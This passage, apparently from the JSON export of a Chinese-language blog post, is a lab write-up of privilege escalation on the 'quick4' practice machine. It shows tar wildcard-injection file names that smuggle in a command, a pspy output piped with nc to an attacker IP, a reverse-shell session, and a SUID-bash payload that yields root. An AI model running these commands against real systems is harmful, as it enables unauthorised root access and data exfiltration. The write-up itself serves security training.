 8 root     root      4096 Feb  9 21:48 employee\ndrwxr-xr-x  2 www-data www-data  4096 Jan 30 21:29 fonts\n-rw-rw-rw-  1 www-data www-data   228 Mar 16 12:15 fuck.py\ndrwxr-xr-x  5 www-data www-data  4096 Jan 22 19:59 images\ndrwxr-xr-x  2 root     root      4096 Jan 30 21:29 img\n-rw-r--r--  1 root     root     51414 Jan 30 22:17 index.html\ndrwxr-xr-x  2 www-data www-data  4096 Jan 30 21:29 js\ndrwxr-xr-x  9 root     root      4096 Jan 30 21:29 lib\ndrwxr-xr-x  2 www-data www-data 20480 Jan 22 20:00 modules\n-rw-r--r--  1 root     root        32 Feb  6 11:34 robots.txt\ndrwxr-xr-x  3 root     root      4096 Jan 30 21:29 scss\n-rw-r--r--  1 www-data www-data  4038 Dec  4 08:39 styles.css\nwww-data@quick4:\/var\/www\/html$ chmod +x fuck.py\nchmod +x fuck.py<\/code><\/pre>\n<p>\u7136\u540e\u521b\u5efa\u68c0\u67e5\u70b9\u8fdb\u884c\u76d1\u5bdf\uff0c\u5229\u7528 tar \u7684\u7279\u6027\uff0c\u5f53 tar \u5230\u8fbe\u6bcf\u4e2a\u6587\u4ef6\u7684\u7ed3\u675f\u65f6\uff0c\u6267\u884c\u6307\u5b9a\u7684\u64cd\u4f5c\uff0c\u4e00\u76f4\u7b49\u5c31\u884c\u4e86<\/p>\n<blockquote>\n<p><a href=\"https:\/\/gtfobins.github.io\/gtfobins\/tar\/#sudo\">https:\/\/gtfobins.github.io\/gtfobins\/tar\/#sudo<\/a><\/p>\n<\/blockquote>\n<pre><code class=\"language-bash\">www-data@quick4:\/var\/www\/html$ touch \/var\/www\/html\/--checkpoint=1\ntouch \/var\/www\/html\/--checkpoint=1\nwww-data@quick4:\/var\/www\/html$ touch \/var\/www\/html\/--checkpoint-action=exec=python3 fuck.py\n&lt;r\/www\/html\/--checkpoint-action=exec=python3 fuck.py\nwww-data@quick4:\/var\/www\/html$ ls -la fuck.py\nls -la fuck.py\n-rwxrwxrwx 1 www-data www-data 228 Mar 16 20:22 fuck.py<\/code><\/pre>\n<p>\u548b\u4e00\u76f4\u6ca1\u52a8\u9759\uff0c\u4f20\u4e00\u4e2a<code> pspy64 <\/code>\u4e0a\u53bb\u770b\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">pspy64 2&gt;\/dev\/null | nc -nv 10.161.181.188 5555<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116232.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116232.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316203817778\" style=\"zoom:33%;\" \/><\/div><\/p>\n<p>\u548b\u4e00\u76f4\u6ca1\u52a8\u9759\uff0c\u624d\u53d1\u73b0\u76d1\u542c\u9519\u7aef\u53e3\u4e86\uff0c\u54c8\u54c8\u54c8\uff0c\u91cd\u65b0\u6765\uff0c\u6362\u4e00\u4e2a\u4e0d\u7528\u4f20\u6587\u4ef6\u7684\uff1a<\/p>\n<pre><code class=\"language-bash\">echo &quot;chmod +s \/bin\/bash&quot; &gt; exp.sh\nchmod +x exp.sh\ntouch \/var\/www\/html\/--checkpoint=1\ntouch \/var\/www\/html\/--checkpoint-action=exec=sh\\ exp.sh\nls -la \/bin\/bash\n\/bin\/bash -p<\/code><\/pre>\n<p>\u548b\u4e00\u76f4\u4e0d\u597d\u5462\uff0c\u6309\u7406\u6765\u8bf4\u4e00\u5206\u949f\u4e00\u6b21\u7684\u554a\uff0c\u91cd\u8d77\u9776\u573a\u518d\u6765\u4e00\u6b21\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~]\n\u2514\u2500$ nc -lvvp 1234\nlistening on [any] 1234 ...\n10.161.192.13: inverse host lookup failed: Unknown host\nconnect to [10.161.181.188] from (UNKNOWN) [10.161.192.13] 48748\nLinux quick4 5.15.0-92-generic #102-Ubuntu SMP Wed Jan 10 09:33:48 UTC 2024 x86_64 x86_64 x86_64 GNU\/Linux\n 21:10:33 up 2 min,  0 users,  load average: 0.12, 0.08, 0.03\nUSER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT\nuid=33(www-data) gid=33(www-data) groups=33(www-data)\n\/bin\/sh: 0: can&#039;t access tty; job control turned off\n$ python3 -c &#039;import pty;pty.spawn(&quot;\/bin\/bash&quot;)&#039;\nwww-data@quick4:\/$ cd \/var\/www\/html\ncd \/var\/www\/html\nwww-data@quick4:\/var\/www\/html$ ls\nls\n404.css   careers  customer  fonts   img         js   modules     scss\n404.html  css      employee  images  index.html  lib  robots.txt  styles.css\nwww-data@quick4:\/var\/www\/html$ echo &quot;chmod +s \/bin\/bash&quot; &gt; exp.sh\necho &quot;chmod +s \/bin\/bash&quot; &gt; exp.sh\nwww-data@quick4:\/var\/www\/html$ chmod +x exp.sh\nchmod +x exp.sh\nwww-data@quick4:\/var\/www\/html$ touch \/var\/www\/html\/--checkpoint=1\ntouch \/var\/www\/html\/--checkpoint=1\nwww-data@quick4:\/var\/www\/html$ touch \/var\/www\/html\/--checkpoint-action=exec=sh\\ exp.sh\n&lt;h \/var\/www\/html\/--checkpoint-action=exec=sh\\ exp.sh\nwww-data@quick4:\/var\/www\/html$ ls -la \/bin\/bash\nls -la \/bin\/bash\n-rwxr-xr-x 1 root root 1396520 Jan  6  2022 \/bin\/bash\nwww-data@quick4:\/var\/www\/html$ ^[[A\nls -la \/bin\/bash\n-rwsr-sr-x 1 root root 1396520 Jan  6  2022 \/bin\/bash\nwww-data@quick4:\/var\/www\/html$ \/bin\/bash -p\n\/bin\/bash -p\nbash-5.1# whoami;id\nwhoami;id\nroot\nuid=33(www-data) gid=33(www-data) euid=0(root) egid=0(root) groups=0(root),33(www-data)\nbash-5.1# cd \/root\ncd \/root\nbash-5.1# ls -la\nls -la\ntotal 56\ndrwx------  7 root root 4096 Feb 12 16:10 .\ndrwxr-xr-x 20 root root 4096 Jan 14 20:49 ..\nlrwxrwxrwx  1 root root    9 Jan 24 13:02 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root root 3106 Oct 15  2021 .bashrc\ndrwx------  2 root root 4096 Jan 25 18:45 .cache\n-rw-------  1 root root   20 Jan 21 14:31 .lesshst\ndrwxr-xr-x  3 root root 4096 Jan 14 21:04 .local\n-rw-r--r--  1 root root  161 Jul  9  2019 .profile\n-rw-r--r--  1 root root   66 Feb  6 11:05 .selected_editor\ndrwx------  2 root root 4096 Jan 14 20:54 .ssh\n-rw-r--r--  1 root root    0 Jan 14 21:10 .sudo_as_admin_successful\ndrwxr-xr-x  7 root root 4096 Jan 22 19:40 dash\n-rw-------  1 root root 8740 Feb  2 14:23 root.txt\ndrwx------  3 root root 4096 Jan 14 20:54 snap\nbash-5.1# cat root.txt\ncat root.txt\n<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116233.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202403162116233.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240316211350091\" \/><\/div><\/p>\n<p>\u540c\u4e0a\uff0cflag\u6211\u63d0\u4ea4\u4e86\uff0c\u5c31\u4e0d\u7559\u4e0b\u6765\u4e86\u3002<\/p>\n","protected":false},"excerpt":{"rendered":"<p>quick4 \u4ee5\u524d\u7684\u5c0f\u9776\u573a\u914d\u7f6e\u4e0d\u4e86\uff0c\u5c1d\u8bd5\u4e00\u4e0b\u6700\u8fd1\u7684\u9776\u573a\u5427\uff1a \u4e0d\u5230\u9ec4\u6cb3\u5fc3\u4e0d\u6b7b\uff0c\u5c31\u662f\u4e0d\u7528virtualbox\uff08\u914d\u9776 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-403","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/403","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=403"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/403\/revisions"}],"predecessor-version":[{"id":404,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/403\/revisions\/404"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=403"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=403"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=403"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}